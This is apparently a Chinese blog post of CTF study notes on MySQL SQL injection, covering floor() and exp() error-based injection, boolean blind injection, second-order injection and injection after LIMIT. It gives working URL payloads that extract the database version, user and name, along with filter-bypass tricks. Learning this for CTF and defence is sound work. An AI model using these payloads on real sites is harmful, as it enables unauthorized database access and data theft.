ctf特训营-学习笔记

最新推荐文章于 2022-09-10 16:31:18 发布
最新推荐文章于 2022-09-10 16:31:18 发布
阅读量2k 收藏
点赞数
分类专栏: CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44555676/article/details/121019157
版权

报错注入-floor报错

简单来说,floor报错的原理是rand和order by或group by的冲突

在MySQL文档中的原文如下:
在这里插入图片描述
经典语句:

and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

floor()报错产生的条件:

select count(*) ,floor(rand(0)*2)x from security.users group by x(自定义数据库的一张表)

floor(rand(0)*2)x的x是为floor(rand(0)*2)添加了一个别名,就是x就等于floor(rand(0)*2)

sql语句要求在查询结果的基础上再执行查询时,必须给定一个别名

爆破数据库版本信息:

?id=1’+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆破当前用户:

?id=1’+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆破当前使用的数据库:
?id=1’+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

报错注入-exp报错

接下来是exp函数报错,exp()报错的本质原因是溢出报错
可以在MySQL中操作
在这里插入图片描述
payload:
?id=1’ and exp(~(select * from (select user())x))%23

Bool盲注

    Bool盲注通常是由于开发者将报错信息屏蔽而导致的,但是网页中真和假有着不同的回显,比如为真时返回access,为假时返回false;或者为真时返回正常页面,为假时跳转到错误页面等。
    Bool盲注中通常会配套使用一些判断真假的语句来进行判定。常用的发现Bool盲注的方法是在输入点后面添加and 1=1和and 1=2(该Payload应在怀疑是整型注入的情况下使用)。
    Bool盲注的原理是如果题目后端拼接了SQL语句,and 1=1为真时不会影响执行结果,但是and 1=2为假,页面则可能会没有正常的回显。
    有时候我们可能会遇到将1=1过滤掉的SQL注入点,这时候我们可以通过修改关键字来绕过过滤,比如将关键字修改为不常见的数值(如1352=1352等)。
    在字符串型注入的时候我们还需要绕过单引号,将Payload修改为如下格式’and’1’=‘1和’or1’='2来闭合单引号。

1.截取函数
在这里插入图片描述
2.转换函数
在这里插入图片描述
3.比较函数
在这里插入图片描述
    注意:在盲注的题目及真实的渗透测试中,有时候使用Sqlmap可能会存在误报。原因在于在一些数据返回页面及接口返回数据时可能会存在返回的是随机字符串(如,时间戳或防止CSRF的Token等)导致页面的长度发生变化的情况,这时候我们的工具及自动化检测脚本会出现误报。我们需要冷静地对Payload和返回结果进行分析。

二次注入

    二次注入的起因是数据在第一次入库的时候进行了一些过滤及转义,当这条数据从数据库中取出来在SQL语句中进行拼接,而在这次拼接中没有进行过滤时,我们就能执行构造好的SQL语句了。
    由于二次注入的业务逻辑较为复杂,在比赛中一般很难发现,所以出题人一般会将源码放出来,或者提示本题有二次注入。
    在二次注入的题目中,一般不会是单纯的二次注入,通常还会与报错注入或Bool盲注结合出题。比如,在注册页面输入的用户名在登录后才有盲注的回显,这时候我们需要自己编写脚本模拟注册及登录。

limit之后的注入

研究发现,在MySQL版本号大于5.0.0且小于5.6.6的时候,在如下位置中可以进行注入:

SELECT field FROM table WHERE id >0 ORDER BY id LIMIT {injection_point}

也可以使用如下的Payload进行注入

SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand().concat(0x3a,version())),1);

Y小短腿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF特训营web部分读书笔记(五)代码审计
闵行小鱼塘
07-30 639
继续阅读《CTF特训营web部分,本节是代码审计
CTF特训营web部分读书笔记(四)利用特性攻击(php和win系统)
闵行小鱼塘
07-29 403
继续阅读《CTF特训营web部分,本节是利用特性攻击
ctf特训营_CTF小白入门- 跨站脚本攻击
weixin_39630140的博客
11-19 201
跨站脚本攻击(Cross Site Scripting , XSS)是指攻击者巧妙的将恶意代码注入到网页中,当用户浏览器中加载网页、渲染网页时,就会执行的恶意代码的过程。经常遭到XSS漏洞的典型应用有 邮件、论坛、留言板等。新浪微博、百度贴吧也曾遭受过 XSS攻击。对内容有不理解的小伙伴或发现错误的小伙伴,可以私信和我联系,共同探讨。如果您喜欢,麻烦点个赞,(づ ̄ 3 ̄)づXSS可以造成哪些危害?...
CTF特训营》——Reverse:干扰分析技术及破解
PICACHU+++的博客
08-05 1317
花指令主要影响静态分析,在IDA中表现为一些指令无法识别,导致某些函数未能识别,从而无法对这些函数进行反编译。在IDA中手动将花指令patch成nop空指令,可以去除花指令,若二进制程序中的花指令较多,那么可以通过分析花指令的特定模式,编写IDAPython脚本对花指令进行自动化搜索。花指令只一种保护代码比较简单的方式,其原理是在原始代码中插入一段无用或者能干扰反汇编引擎的代码,这段代码并没有什么功能性作用,只是一种扰乱代码分析的手段。通过patch去除花指令。花指令影响IDA反汇编。...........
CTF特训营》——PWN:二进制安全基础
PICACHU+++的博客
08-13 2656
即DEP,是进制程序在非可执行的内存区中执行指令。在80x86体系中,操作系统的内存管理是通过页面表存储方式来实现,其最后一位就是NX位,0表示允许执行,1表示禁止执行。NX一般是防止直接在堆和栈上运行shellcode代码,gcc默认开启不可执行栈功能,添加编译选项z -exestack可开启栈可执行功能。...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf拼图例题-puzzle
04-13
关于puzzle例题的原题资源,搭配文章使用更配噢 https://editor.csdn.net/md/?articleId=124139016
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-Tools-v1.3.7.zip
最新发布
01-29
CTF常用工具集
【转】CTF-All-In-One(CTF从入门到放弃)pdf
03-20
CTF-All-In-One(CTF 从入门到放弃) ——“与其相信谣言,不如一直学习。”
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
CTF资料.zip
07-25
分享一些关于CTF学习文档,希望能帮到有需要的小伙伴。
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际环境的实验平台
HCFRSetup V3.5.1.4.rar
01-16
爱色丽调校显示器、投影仪等视频显示设备的软件,配合爱色丽较色仪使用,保持显示设备的准确性是图像视频操作的基础,不重视校色将导致图像、视频色准及亮度等信息失准,严重影响工作效果,建议所有视频相关的专业人士定期校色。同时,使用专业电视显示设备、投影仪的爱好者同样需要通过校色保证最佳的显示效果。
ctf特训营_这些网络安全竞技(CTF)真题实训,你都会了吗?
weixin_39955829的博客
11-04 319
在之前,小编已经分享过不少CTF的实战干货,包括各种各样的靶场训练、工具集合、题目套路等等。相信跟随我们持续”收藏“的同学,都已经练习过不少CTF实战题目了,要提升还缺点什么呢?还缺比赛经验。很多CTFer大神们都会建议新手在学习阶段一定要多去参加比赛,并且不要害怕失败,在比赛中越挫越勇才能帮助你最快的成长。因为比赛的题目之所以会被出题人选中,一定是因为该题目有其独到之处,算得上是题目中的精英,靶...
CTF特训营》——利用特性实现的攻击
PICACHU+++的博客
09-10 1052
在不同的环境之下,相同的代码可能带来不一样的实现效果,对于开发人员来说,不同的环境应该写出兼容性更好的代码,对于安全人员来说,利用环境,也可以让一行普通的语句变成漏洞。
CTF特训营】 Reverse篇 1. 概述
ll14856lk的博客
12-25 761
1.逆向分析的主要方法 1.静态分析法:不执行代码文件的情形下,对代码进行静态分析的一种方法,包括文件类型分析,静态反汇编,反编译。 2.动态分析法:使用调试器动态分析 2.汇编指令体系结构 1.X86:见王爽汇编指令-之前做过笔记 2.x64:这里暂时略过,主要先把x86弄明白 3.逆向分析工具 1.IDA 一些基本使用: 1)函数修正 2)指令修正: 在IDA中,有些指令或者数据会识别错误,可以手动修正: 快捷键 作用 D 转化为数据 C 转化为代码 3)数据修正 4)注释信
特殊的日子—IDF实验室CTF训练营
weixin_30345577的博客
01-09 130
题目地址:http://ctf.idf.cn/index.php?g=game&m=article&a=index&id=50 Python3.5 特殊的日子 2015-01-06 18:09:25 作者:admin 255 2 每个人的一生中都会或多或少有那么几个对自己很重要的日子,比如对于我来说,这一天就很重要。 答案格式wctf{日期} //友情提示,此...
ctf 特训营 pdf csdn
09-25
同时,他们还可以借助其他CSDN用户的经验分享,深入理解和学习关于CTF特训营的知识。 总之,CTF特训营PDF文件在CSDN上的存在对于提高参与者的网络安全知识和技能非常有帮助,同时也丰富了CSDN平台上关于网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值